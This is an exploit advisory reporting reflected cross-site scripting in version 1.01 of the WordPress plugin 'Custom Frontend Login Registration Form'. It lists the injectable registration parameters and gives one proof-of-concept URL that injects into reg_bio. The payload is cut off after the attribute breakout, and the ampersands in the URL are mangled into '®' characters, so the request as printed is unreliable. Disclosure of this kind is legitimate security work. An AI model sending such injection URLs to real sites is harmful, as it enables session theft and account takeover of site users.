======================================================================================== Custom Frontend Login Registration Form v1.01 (WP Plugin) - Multiple XSS Vulnerabilities ======================================================================================== ____________________________________________________________________________________ # Exploit Title: Custom Frontend Login Registration Form (WP Plugin) - Multiple XSS Vulnerabilities # Date: [11-13-2018] # Category: Webapps ____________________________________________________________________________________ # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com ____________________________________________________________________________________ # Software Link: https://wordpress.org/plugins/custom-frontend-login-registration-form # Plugin: Custom Frontend Login Registration Form # Version: v1.01 (last version) # File: Registration Form # Parameters: reg_bio, reg_email, reg_fname, reg_lname, reg_name, nickname, reg_password, and reg_website. # Language: This application is available in English language. # Plugin Description: A WordPress plugin that an administrator can use to create login forms and custom registration forms; then, after creating those forms, an admin can use a shortcode to place a login/registration form on a page or post. ____________________________________________________________________________________ # Cross-Site Scripting Vulnerabilities: Registration Form - Parameter: reg_bio http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=®_bio=qadoh">